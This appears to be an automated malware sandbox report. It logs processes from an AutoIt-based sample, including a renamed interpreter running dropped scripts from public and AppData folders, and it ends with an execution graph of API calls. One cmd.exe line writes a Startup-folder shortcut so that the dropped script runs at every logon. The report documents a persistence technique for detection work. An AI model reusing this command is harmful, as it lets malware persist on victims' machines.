                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6ee680000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:23
                                                                                                                  Start time:01:08:23
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Users\Public\Guard.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
                                                                                                                  Imagebase:0x3c0000
                                                                                                                  File size:893'608 bytes
                                                                                                                  MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 8%, ReversingLabs
                                                                                                                  Has exited:false

                                                                                                                  Target ID:24
                                                                                                                  Start time:01:08:26
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
                                                                                                                  Imagebase:0xa40000
                                                                                                                  File size:236'544 bytes
                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:25
                                                                                                                  Start time:01:08:26
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6ee680000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:26
                                                                                                                  Start time:01:08:30
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                                                                                  Imagebase:0x7ff623540000
                                                                                                                  File size:468'120 bytes
                                                                                                                  MD5 hash:B3676839B2EE96983F9ED735CD044159
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:27
                                                                                                                  Start time:01:08:30
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6ee680000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:28
                                                                                                                  Start time:01:08:35
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\System32\wscript.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js"
                                                                                                                  Imagebase:0x7ff62c6c0000
                                                                                                                  File size:170'496 bytes
                                                                                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:29
                                                                                                                  Start time:01:08:37
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
                                                                                                                  Imagebase:0x5c0000
                                                                                                                  File size:893'608 bytes
                                                                                                                  MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 8%, ReversingLabs
                                                                                                                  Has exited:false

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1488205012.00007FFB4AF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF60000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffb4af60000_powershell.jbxd

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:2.5%
                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                    Signature Coverage:10.1%
                                                                                                                    Total number of Nodes:1557
                                                                                                                    Total number of Limit Nodes:41
7ff655fee330 4 API calls 94348->94351 94352 7ff655fee330 4 API calls 94349->94352 94353 7ff65607f8b5 94350->94353 94354 7ff65607f783 94351->94354 94357 7ff65607f868 94352->94357 94355 7ff65607f8f0 94353->94355 94436 7ff655fff688 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94353->94436 94356 7ff655fed4cc 48 API calls 94354->94356 94364 7ff65607f905 94355->94364 94365 7ff65607f901 94355->94365 94359 7ff65607f798 94356->94359 94357->94344 94357->94355 94361 7ff655fee330 4 API calls 94359->94361 94360 7ff65607f8d0 94437 7ff655fff688 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94360->94437 94363 7ff65607f7a4 94361->94363 94367 7ff655fed4cc 48 API calls 94363->94367 94439 7ff65605fddc 8 API calls 94364->94439 94369 7ff65607f972 94365->94369 94370 7ff65607fa0f CreateProcessW 94365->94370 94366 7ff65607f8e0 94438 7ff655fff688 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94366->94438 94372 7ff65607f7b9 94367->94372 94442 7ff65604d1f8 99 API calls 94369->94442 94401 7ff65607f9b4 94370->94401 94375 7ff655fee330 4 API calls 94372->94375 94373 7ff65607f90e 94440 7ff65605fca8 8 API calls 94373->94440 94377 7ff65607f7c5 94375->94377 94379 7ff65607f806 GetSystemDirectoryW 94377->94379 94383 7ff655fed4cc 48 API calls 94377->94383 94378 7ff65607f926 94441 7ff65605fafc 8 API calls ~SyncLockT 94378->94441 94382 7ff656004c68 4 API calls 94379->94382 94381 7ff65607f94f 94381->94365 94384 7ff65607f830 GetSystemDirectoryW 94382->94384 94385 7ff65607f7e1 94383->94385 94384->94353 94387 7ff655fee330 4 API calls 94385->94387 94386 7ff65607fabe CloseHandle 94388 7ff65607facc 94386->94388 94389 7ff65607faf5 94386->94389 94390 7ff65607f7ed 94387->94390 94443 7ff65605f7dc 94388->94443 94392 7ff65607fafe 94389->94392 94396 7ff65607fb26 CloseHandle 94389->94396 94390->94353 94390->94379 94400 7ff65607faa3 94392->94400 94394 7ff65607fa64 94397 7ff65607fa84 GetLastError 94394->94397 94396->94400 94397->94400 
94427 7ff65605f51c 94400->94427 94401->94386 94401->94394 94405 7ff655fed50b 94404->94405 94418 7ff655fed4f2 94404->94418 94406 7ff655fed513 94405->94406 94407 7ff655fed53e 94405->94407 94448 7ff65600956c 31 API calls 94406->94448 94411 7ff655fed550 94407->94411 94415 7ff656039bbc 94407->94415 94417 7ff656039cc4 94407->94417 94410 7ff655fed522 94416 7ff655feec00 4 API calls 94410->94416 94449 7ff656004834 46 API calls 94411->94449 94412 7ff656039cdc 94419 7ff656004c68 4 API calls 94415->94419 94422 7ff656039c3e Concurrency::wait wcscpy 94415->94422 94416->94418 94451 7ff656009538 31 API calls 94417->94451 94423 7ff655fee330 94418->94423 94420 7ff656039c0a 94419->94420 94421 7ff655feec00 4 API calls 94420->94421 94421->94422 94450 7ff656004834 46 API calls 94422->94450 94424 7ff655fee342 94423->94424 94425 7ff656004c68 4 API calls 94424->94425 94426 7ff655fee361 wcscpy 94425->94426 94426->94341 94428 7ff65605f7dc CloseHandle 94427->94428 94429 7ff65605f52a 94428->94429 94452 7ff65605f7b8 94429->94452 94432 7ff65605f7b8 ~SyncLockT CloseHandle 94433 7ff65605f53c 94432->94433 94434 7ff65605f7b8 ~SyncLockT CloseHandle 94433->94434 94435 7ff65605f545 94434->94435 94435->94110 94436->94360 94437->94366 94438->94355 94439->94373 94440->94378 94441->94381 94442->94401 94444 7ff65605f7b8 ~SyncLockT CloseHandle 94443->94444 94445 7ff65605f7ee 94444->94445 94446 7ff65605f7b8 ~SyncLockT CloseHandle 94445->94446 94447 7ff65605f7f7 94446->94447 94448->94410 94449->94410 94450->94417 94451->94412 94453 7ff65605f7c9 CloseHandle 94452->94453 94454 7ff65605f533 94452->94454 94453->94454 94454->94432 94456 7ff65605b42a 94455->94456 94457 7ff65605b3c8 94455->94457 94460 7ff65605b334 4 API calls 94456->94460 94458 7ff65605b41e 94457->94458 94459 7ff65605b3d0 94457->94459 94528 7ff65605b458 8 API calls 94458->94528 94462 7ff65605b3dd 94459->94462 94463 7ff65605b3f1 94459->94463 94472 7ff65605b410 Concurrency::wait 94460->94472 94524 7ff655fea368 RtlPcToFileHeader RaiseException 
EnterCriticalSection LeaveCriticalSection 94462->94524 94526 7ff655fea368 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94463->94526 94466 7ff65605b3f6 94527 7ff65605b270 6 API calls 94466->94527 94467 7ff65605b3e2 94525 7ff656004120 6 API calls 94467->94525 94470 7ff65605b3ef 94521 7ff65605b384 94470->94521 94472->94168 94474 7ff656004c68 4 API calls 94473->94474 94475 7ff655fe8363 94474->94475 94476 7ff655fe8314 CloseHandle 94475->94476 94477 7ff655fe836f 94476->94477 94529 7ff655fe9640 94477->94529 94479 7ff655fe8378 94480 7ff655fe8314 CloseHandle 94479->94480 94481 7ff655fe8380 94480->94481 94481->94150 94483 7ff655fe8314 CloseHandle 94482->94483 94484 7ff655fe685a 94483->94484 94485 7ff65602caa8 94484->94485 94486 7ff655fe687d CreateFileW 94484->94486 94487 7ff65602caae CreateFileW 94485->94487 94495 7ff655fe68d9 94485->94495 94491 7ff655fe68ab 94486->94491 94488 7ff65602cae6 94487->94488 94487->94491 94534 7ff655fe6a18 SetFilePointerEx SetFilePointerEx SetFilePointerEx 94488->94534 94490 7ff65602caf3 94490->94491 94497 7ff655fe68e4 94491->94497 94532 7ff655fe68f4 9 API calls 94491->94532 94493 7ff655fe68c1 94493->94495 94533 7ff655fe6a18 SetFilePointerEx SetFilePointerEx SetFilePointerEx 94493->94533 94496 7ff65605b334 4 API calls 94495->94496 94495->94497 94496->94497 94497->94152 94497->94160 94535 7ff655fe82e4 94498->94535 94502 7ff656004c68 4 API calls 94501->94502 94503 7ff655fe9918 94502->94503 94503->94171 94505 7ff655fe721c 94504->94505 94507 7ff65602cd0c 94504->94507 94506 7ff655fe7274 94505->94506 94511 7ff65602cd66 memcpy_s 94505->94511 94540 7ff655feb960 94506->94540 94510 7ff656004c68 4 API calls 94507->94510 94509 7ff655fe7283 memcpy_s 94509->94177 94510->94511 94512 7ff656004c68 4 API calls 94511->94512 94513 7ff65602cdda memcpy_s 94512->94513 94514->94157 94545 7ff65605b188 94515->94545 94519 7ff655fe833d CloseHandle 94518->94519 94520 7ff655fe832a 94518->94520 94519->94520 94520->94153 94520->94176 94522 
7ff65605b334 4 API calls 94521->94522 94523 7ff65605b399 94522->94523 94523->94472 94524->94467 94525->94470 94526->94466 94527->94470 94528->94472 94530 7ff656004c68 4 API calls 94529->94530 94531 7ff655fe9663 94530->94531 94531->94479 94532->94493 94533->94495 94534->94490 94536 7ff655fe8314 CloseHandle 94535->94536 94537 7ff655fe82f2 Concurrency::wait 94536->94537 94538 7ff655fe8314 CloseHandle 94537->94538 94539 7ff655fe8303 94538->94539 94541 7ff655feb981 94540->94541 94544 7ff655feb976 memcpy_s 94540->94544 94542 7ff656004c68 4 API calls 94541->94542 94543 7ff65602ef2a 94541->94543 94542->94544 94544->94509 94546 7ff65605b19c WriteFile 94545->94546 94547 7ff65605b193 94545->94547 94546->94168 94549 7ff65605b208 SetFilePointerEx SetFilePointerEx SetFilePointerEx 94547->94549 94549->94546 94551 7ff655fef123 memcpy_s 94550->94551 94552 7ff655fef111 94550->94552 94551->94202 94552->94551 94553 7ff656004c68 4 API calls 94552->94553 94553->94551 94555 7ff655fe9640 4 API calls 94554->94555 94556 7ff656056f76 94555->94556 94557 7ff655fe98e8 4 API calls 94556->94557 94558 7ff656056f87 94557->94558 94559 7ff656056a5c CompareStringW 94558->94559 94565 7ff656056fb6 94558->94565 94560 7ff656056faf 94559->94560 94562 7ff655fe7da4 4 API calls 94560->94562 94560->94565 94562->94565 94563 7ff655fe7da4 4 API calls 94563->94565 94564 7ff655fe7c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94564->94565 94565->94563 94565->94564 94566 7ff656057072 94565->94566 94568 7ff65605704f 94565->94568 94588 7ff656056a5c 94565->94588 94567 7ff655fef0ec 4 API calls 94566->94567 94569 7ff656057083 Concurrency::wait 94566->94569 94567->94569 94570 7ff655fe7da4 4 API calls 94568->94570 94569->94208 94571 7ff656057065 94570->94571 94595 7ff655fe7c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 94571->94595 94573->94210 94575 7ff65602d32c 94574->94575 94578 7ff655fe7dd3 94574->94578 94603 7ff655fedda4 94575->94603 
94577 7ff65602d33f 94578->94575 94579 7ff655fe7dff 94578->94579 94582 7ff65602d2e4 94578->94582 94598 7ff655fe7e4c 94579->94598 94581 7ff655fe7e0a memcpy_s 94581->94200 94583 7ff656004c68 4 API calls 94582->94583 94583->94575 94584->94203 94585->94208 94586->94210 94587->94210 94589 7ff656056a90 94588->94589 94590 7ff656056ad6 94589->94590 94591 7ff656056b81 94589->94591 94592 7ff656056ac0 94589->94592 94590->94565 94591->94590 94597 7ff656001ad0 CompareStringW 94591->94597 94592->94590 94596 7ff656001ad0 CompareStringW 94592->94596 94595->94566 94596->94592 94597->94591 94600 7ff655fe7e7b 94598->94600 94602 7ff655fe7e6b 94598->94602 94599 7ff65602d346 94600->94599 94601 7ff656004c68 4 API calls 94600->94601 94601->94602 94602->94581 94604 7ff655fedda9 94603->94604 94605 7ff655feddc7 memcpy_s 94603->94605 94604->94605 94607 7ff655fea7c0 94604->94607 94605->94577 94605->94605 94608 7ff655fea7dd memcpy_s 94607->94608 94609 7ff655fea7ed 94607->94609 94608->94605 94610 7ff65602e7da 94609->94610 94611 7ff656004c68 4 API calls 94609->94611 94611->94608 94615 7ff65605c7c0 lstrlenW 94612->94615 94616 7ff65605c7dd GetFileAttributesW 94615->94616 94618 7ff65605bdf5 94615->94618 94617 7ff65605c7eb FindFirstFileW 94616->94617 94616->94618 94617->94618 94619 7ff65605c7ff FindClose 94617->94619 94618->94221 94619->94618 94620->94233 94621->94270 94622->94274 94623->94280 94624->94288 94625->94281 94626->94291 94627->94297 94629->94297 94630->94308 94631->94308 94632->94307 94633 7ff656008fac 94634 7ff65600901c 94633->94634 94635 7ff656008fd2 GetModuleHandleW 94633->94635 94650 7ff65601b9bc EnterCriticalSection 94634->94650 94635->94634 94642 7ff656008fdf 94635->94642 94637 7ff6560090cb 94638 7ff65601ba10 _isindst LeaveCriticalSection 94637->94638 94640 7ff6560090f0 94638->94640 94639 7ff656009026 94639->94637 94641 7ff6560090a0 94639->94641 94645 7ff65601aa8c 30 API calls 94639->94645 94644 7ff6560090fc 94640->94644 94649 7ff656009118 11 API calls 94640->94649 94643 7ff6560090b8 
94641->94643 94647 7ff65601ada4 75 API calls 94641->94647 94642->94634 94651 7ff656009164 GetModuleHandleExW 94642->94651 94648 7ff65601ada4 75 API calls 94643->94648 94645->94641 94647->94643 94648->94637 94649->94644 94652 7ff65600918e GetProcAddress 94651->94652 94653 7ff6560091b5 94651->94653 94652->94653 94656 7ff6560091a8 94652->94656 94654 7ff6560091bf FreeLibrary 94653->94654 94655 7ff6560091c5 94653->94655 94654->94655 94655->94634 94656->94653 94657 7ff65603b221 94658 7ff65603b22a 94657->94658 94665 7ff655ff0378 94657->94665 94680 7ff6560547bc RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 94658->94680 94660 7ff65603b241 94681 7ff656054708 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 94660->94681 94662 7ff65603b264 94663 7ff655ff3c20 301 API calls 94662->94663 94664 7ff65603b292 94663->94664 94671 7ff655ff0405 94664->94671 94682 7ff656078d98 49 API calls Concurrency::wait 94664->94682 94674 7ff655fef7b8 94665->94674 94668 7ff65603b2d9 Concurrency::wait 94668->94665 94683 7ff6560547bc RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 94668->94683 94669 7ff655ff070a 94671->94669 94673 7ff655fee0a8 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94671->94673 94684 7ff655feee20 5 API calls Concurrency::wait 94671->94684 94673->94671 94678 7ff655fef7d5 94674->94678 94675 7ff655fef7de 94675->94671 94676 7ff655fe9640 4 API calls 94676->94678 94677 7ff655fee0a8 4 API calls 94677->94678 94678->94675 94678->94676 94678->94677 94679 7ff655fef7b8 4 API calls 94678->94679 94679->94678 94680->94660 94681->94662 94682->94668 94683->94668 94684->94671 94685 7ff65603f890 94694 7ff655fee18c 94685->94694 94687 7ff65603f8a9 94689 7ff65603f915 Concurrency::wait 94687->94689 94700 7ff656002ac0 CharUpperBuffW RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94687->94700 94692 7ff6560403e1 Concurrency::wait 
94689->94692 94702 7ff6560634e4 77 API calls 3 library calls 94689->94702 94691 7ff65603f8f6 94691->94689 94701 7ff656061464 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94691->94701 94695 7ff655fee1c2 94694->94695 94696 7ff655fee1a7 94694->94696 94698 7ff655fee1af 94695->94698 94704 7ff655feee20 5 API calls Concurrency::wait 94695->94704 94703 7ff655feee20 5 API calls Concurrency::wait 94696->94703 94698->94687 94700->94691 94702->94692 94703->94698 94704->94698 94705 7ff655fe5dec 94706 7ff655fe5df4 94705->94706 94707 7ff655fe5e98 94706->94707 94708 7ff655fe5e28 94706->94708 94727 7ff655fe5e96 94706->94727 94712 7ff65602c229 94707->94712 94713 7ff655fe5e9e 94707->94713 94709 7ff655fe5e35 94708->94709 94710 7ff655fe5f21 PostQuitMessage 94708->94710 94714 7ff655fe5e40 94709->94714 94715 7ff65602c2af 94709->94715 94717 7ff655fe5e7c 94710->94717 94711 7ff655fe5e6b DefWindowProcW 94711->94717 94761 7ff655ffede4 8 API calls 94712->94761 94718 7ff655fe5ea5 94713->94718 94719 7ff655fe5ecc SetTimer RegisterWindowMessageW 94713->94719 94720 7ff655fe5f2b 94714->94720 94721 7ff655fe5e49 94714->94721 94773 7ff65605a40c 16 API calls __scrt_fastfail 94715->94773 94725 7ff65602c1b8 94718->94725 94726 7ff655fe5eae KillTimer 94718->94726 94719->94717 94722 7ff655fe5efc CreatePopupMenu 94719->94722 94751 7ff656004610 94720->94751 94721->94727 94734 7ff655fe5e5f 94721->94734 94735 7ff655fe5f0b 94721->94735 94722->94717 94724 7ff65602c255 94762 7ff656002c44 47 API calls Concurrency::wait 94724->94762 94731 7ff65602c1f7 MoveWindow 94725->94731 94732 7ff65602c1bd 94725->94732 94747 7ff655fe5d88 94726->94747 94727->94711 94728 7ff65602c2c3 94728->94711 94728->94717 94731->94717 94736 7ff65602c1e4 SetFocus 94732->94736 94737 7ff65602c1c2 94732->94737 94734->94711 94744 7ff655fe5d88 Shell_NotifyIconW 94734->94744 94759 7ff655fe5f3c 26 API calls __scrt_fastfail 94735->94759 94736->94717 94737->94734 94740 7ff65602c1cb 94737->94740 94760 7ff655ffede4 8 API calls 
94740->94760 94742 7ff655fe5f1f 94742->94717 94745 7ff65602c280 94744->94745 94763 7ff655fe6258 94745->94763 94748 7ff655fe5de4 94747->94748 94749 7ff655fe5d99 __scrt_fastfail 94747->94749 94758 7ff655fe7098 DeleteObject DestroyWindow Concurrency::wait 94748->94758 94750 7ff655fe5db8 Shell_NotifyIconW 94749->94750 94750->94748 94752 7ff6560046db 94751->94752 94753 7ff65600461a __scrt_fastfail 94751->94753 94752->94717 94774 7ff655fe72c8 94753->94774 94755 7ff6560046a2 KillTimer SetTimer 94755->94752 94756 7ff656004660 94756->94755 94757 7ff65604aaa1 Shell_NotifyIconW 94756->94757 94757->94755 94758->94717 94759->94742 94760->94717 94761->94724 94762->94734 94764 7ff655fe6287 __scrt_fastfail 94763->94764 94808 7ff655fe61c4 94764->94808 94767 7ff655fe632d 94769 7ff655fe634e Shell_NotifyIconW 94767->94769 94770 7ff65602c644 Shell_NotifyIconW 94767->94770 94771 7ff655fe72c8 6 API calls 94769->94771 94772 7ff655fe6365 94771->94772 94772->94727 94773->94728 94775 7ff655fe72f4 94774->94775 94776 7ff655fe73bc Concurrency::wait 94774->94776 94777 7ff655fe98e8 4 API calls 94775->94777 94776->94756 94778 7ff655fe7303 94777->94778 94779 7ff65602cdfc LoadStringW 94778->94779 94780 7ff655fe7310 94778->94780 94782 7ff65602ce1e 94779->94782 94796 7ff655fe7cf4 94780->94796 94784 7ff655fee0a8 4 API calls 94782->94784 94783 7ff655fe7324 94785 7ff65602ce30 94783->94785 94786 7ff655fe7336 94783->94786 94792 7ff655fe734f __scrt_fastfail wcscpy 94784->94792 94807 7ff655fe7c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 94785->94807 94786->94782 94787 7ff655fe7343 94786->94787 94806 7ff655fe7c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 94787->94806 94790 7ff65602ce3c 94791 7ff655fe71f8 4 API calls 94790->94791 94790->94792 94793 7ff65602ce63 94791->94793 94794 7ff655fe73a3 Shell_NotifyIconW 94792->94794 94795 7ff655fe71f8 4 API calls 94793->94795 94794->94776 94795->94792 94797 
7ff65602d2c8 94796->94797 94798 7ff655fe7d0d 94796->94798 94799 7ff655fedda4 4 API calls 94797->94799 94801 7ff655fe7d24 94798->94801 94803 7ff655fe7d51 94798->94803 94800 7ff65602d2d3 94799->94800 94802 7ff655fe7e4c 4 API calls 94801->94802 94805 7ff655fe7d2f memcpy_s 94802->94805 94803->94800 94804 7ff656004c68 4 API calls 94803->94804 94804->94805 94805->94783 94806->94792 94807->94790 94809 7ff65602c5f8 94808->94809 94810 7ff655fe61e0 94808->94810 94809->94810 94811 7ff65602c602 DestroyIcon 94809->94811 94810->94767 94812 7ff65605ad94 39 API calls wcsftime 94810->94812 94811->94810 94812->94767 94813 7ff655ff2bf8 94816 7ff655feed44 94813->94816 94815 7ff655ff2c05 94817 7ff655feed75 94816->94817 94818 7ff655feedcd 94816->94818 94817->94818 94820 7ff655ff3c20 301 API calls 94817->94820 94823 7ff655feedfe 94818->94823 94826 7ff6560634e4 77 API calls 3 library calls 94818->94826 94822 7ff655feeda8 94820->94822 94821 7ff65603a636 94822->94823 94825 7ff655feee20 5 API calls Concurrency::wait 94822->94825 94823->94815 94825->94818 94826->94821 94827 7ff656005328 94852 7ff656004cac 94827->94852 94830 7ff656005474 94886 7ff6560057e4 7 API calls __scrt_fastfail 94830->94886 94831 7ff656005344 94833 7ff65600547e 94831->94833 94834 7ff656005362 94831->94834 94887 7ff6560057e4 7 API calls __scrt_fastfail 94833->94887 94843 7ff6560053a4 __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 94834->94843 94858 7ff65601ae1c 94834->94858 94838 7ff656005387 94839 7ff656005489 abort 94841 7ff65600540d 94869 7ff656005930 94841->94869 94843->94841 94883 7ff656009204 35 API calls FindHandler 94843->94883 94844 7ff656005412 94872 7ff655fe3730 94844->94872 94849 7ff656005435 94849->94839 94885 7ff656004e90 8 API calls 2 library calls 94849->94885 94851 7ff65600544c 94851->94838 94853 7ff656004cce __scrt_initialize_crt 94852->94853 94888 7ff6560065ec 94853->94888 94855 7ff656004cd7 94855->94830 94855->94831 94856 7ff656004cd3 __scrt_initialize_crt 94856->94855 94896 
7ff656006620 8 API calls 3 library calls 94856->94896 94860 7ff65601ae34 94858->94860 94859 7ff656005383 94859->94838 94862 7ff65601ada4 94859->94862 94860->94859 94921 7ff656005244 94860->94921 94863 7ff65601adff 94862->94863 94864 7ff65601ade0 94862->94864 94863->94843 94864->94863 94995 7ff655fe1064 94864->94995 95000 7ff655fe1048 94864->95000 95005 7ff655fe1080 94864->95005 95010 7ff655fe10e8 94864->95010 95204 7ff656006240 94869->95204 94873 7ff655fe3743 IsThemeActive 94872->94873 94874 7ff655fe37a3 94872->94874 95206 7ff6560092d0 94873->95206 94884 7ff656005974 GetModuleHandleW 94874->94884 94880 7ff655fe377d 95218 7ff655fe37b0 94880->95218 94882 7ff655fe3785 SystemParametersInfoW 94882->94874 94883->94841 94884->94849 94885->94851 94886->94833 94887->94839 94889 7ff6560065f5 __vcrt_initialize_winapi_thunks __vcrt_initialize 94888->94889 94897 7ff656007290 94889->94897 94892 7ff656006603 94892->94856 94894 7ff65600660c 94894->94892 94904 7ff6560072d8 DeleteCriticalSection 94894->94904 94896->94855 94898 7ff656007298 94897->94898 94900 7ff6560072c9 94898->94900 94902 7ff6560065ff 94898->94902 94905 7ff656007614 94898->94905 94910 7ff6560072d8 DeleteCriticalSection 94900->94910 94902->94892 94903 7ff656007218 8 API calls 3 library calls 94902->94903 94903->94894 94904->94892 94911 7ff656007310 94905->94911 94908 7ff656007654 94908->94898 94909 7ff65600765f InitializeCriticalSectionAndSpinCount 94909->94908 94910->94902 94912 7ff656007371 94911->94912 94919 7ff65600736c try_get_function 94911->94919 94912->94908 94912->94909 94913 7ff656007454 94913->94912 94916 7ff656007462 GetProcAddress 94913->94916 94914 7ff6560073a0 LoadLibraryExW 94915 7ff6560073c1 GetLastError 94914->94915 94914->94919 94915->94919 94917 7ff656007473 94916->94917 94917->94912 94918 7ff656007439 FreeLibrary 94918->94919 94919->94912 94919->94913 94919->94914 94919->94918 94920 7ff6560073fb LoadLibraryExW 94919->94920 94920->94919 94922 7ff656005254 94921->94922 94938 7ff656012584 
94922->94938 94924 7ff656005260 94944 7ff656004cf8 94924->94944 94927 7ff656005279 _RTC_Initialize 94936 7ff6560052ce 94927->94936 94949 7ff656004f0c 94927->94949 94928 7ff6560052fa __scrt_initialize_default_local_stdio_options 94928->94860 94930 7ff65600528e 94952 7ff65601a09c 94930->94952 94934 7ff6560052a3 94935 7ff65601aebc 35 API calls 94934->94935 94935->94936 94937 7ff6560052ea 94936->94937 94975 7ff6560057e4 7 API calls __scrt_fastfail 94936->94975 94937->94860 94939 7ff656012595 94938->94939 94940 7ff65601259d 94939->94940 94976 7ff6560155d4 15 API calls _invalid_parameter_noinfo 94939->94976 94940->94924 94942 7ff6560125ac 94977 7ff65601b164 31 API calls _invalid_parameter_noinfo 94942->94977 94945 7ff656004d16 __scrt_initialize_onexit_tables 94944->94945 94946 7ff656004d0d 94944->94946 94945->94927 94946->94945 94978 7ff6560057e4 7 API calls __scrt_fastfail 94946->94978 94948 7ff656004dcf 94979 7ff656004ebc 94949->94979 94951 7ff656004f15 94951->94930 94953 7ff65601a0ba 94952->94953 94954 7ff65601a0d0 GetModuleFileNameW 94952->94954 94984 7ff6560155d4 15 API calls _invalid_parameter_noinfo 94953->94984 94958 7ff65601a0fd 94954->94958 94956 7ff65601a0bf 94985 7ff65601b164 31 API calls _invalid_parameter_noinfo 94956->94985 94986 7ff65601a038 15 API calls 2 library calls 94958->94986 94959 7ff65600529a 94959->94936 94974 7ff656005ac4 InitializeSListHead 94959->94974 94961 7ff65601a13d 94962 7ff65601a145 94961->94962 94964 7ff65601a156 94961->94964 94987 7ff6560155d4 15 API calls _invalid_parameter_noinfo 94962->94987 94966 7ff65601a1bb 94964->94966 94967 7ff65601a1a2 94964->94967 94972 7ff65601a14a 94964->94972 94965 7ff65601b3c0 __free_lconv_num 15 API calls 94965->94959 94970 7ff65601b3c0 __free_lconv_num 15 API calls 94966->94970 94988 7ff65601b3c0 94967->94988 94969 7ff65601a1ab 94971 7ff65601b3c0 __free_lconv_num 15 API calls 94969->94971 94970->94972 94973 7ff65601a1b7 94971->94973 94972->94965 94973->94959 94975->94928 94976->94942 94977->94940 
